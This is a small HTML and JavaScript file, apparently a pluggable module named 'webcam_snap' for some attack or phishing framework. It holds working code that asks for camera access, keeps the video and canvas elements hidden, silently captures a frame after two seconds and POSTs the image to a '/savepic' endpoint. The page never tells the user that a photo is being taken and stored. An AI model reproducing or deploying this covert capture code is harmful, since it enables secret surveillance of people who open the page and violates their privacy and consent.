<html>
<!--
MLBname=webcam_snap
MLBdesc=module for taking picture from webcam
-->
<head>
	<title>test</title>
</head>
<!-- MLB-BODY -->
<body>
	<div class="video-wrap">
		<video id="video" playsinline autoplay hidden></video>
	</div>

	<canvas id="canvas" width="640" height="480" hidden></canvas>
</body>

<script>
	'use strict';
//MLB-START
	const video = document.getElementById('video')
	const canvas = document.getElementById('canvas')

	const constraints = {
		audio: false,
		video: {
			width: 640, height: 480
		}
	}

	function sleep(ms) {
		return new Promise(resolve => setTimeout(resolve, ms));
	}
//MLB-CALL
	async function init(){
		const stream = await navigator.mediaDevices.getUserMedia(constraints);
		window.stream = stream;
		video.srcObject = stream;
		await sleep(2000);
		var context = canvas.getContext("2d");
		context.drawImage(video, 0, 0,640,480);
		var img_url = canvas.toDataURL("image/jpeg");
		fetch("/savepic", {
							      	method: 'POST',
							      	body: JSON.stringify(img_url),
							      	headers: {"Content-Type":"application/json"},
							      	credentials:"same-origin"
							      	}
					);
	}
//MLB-END
	init();
</script>
</html>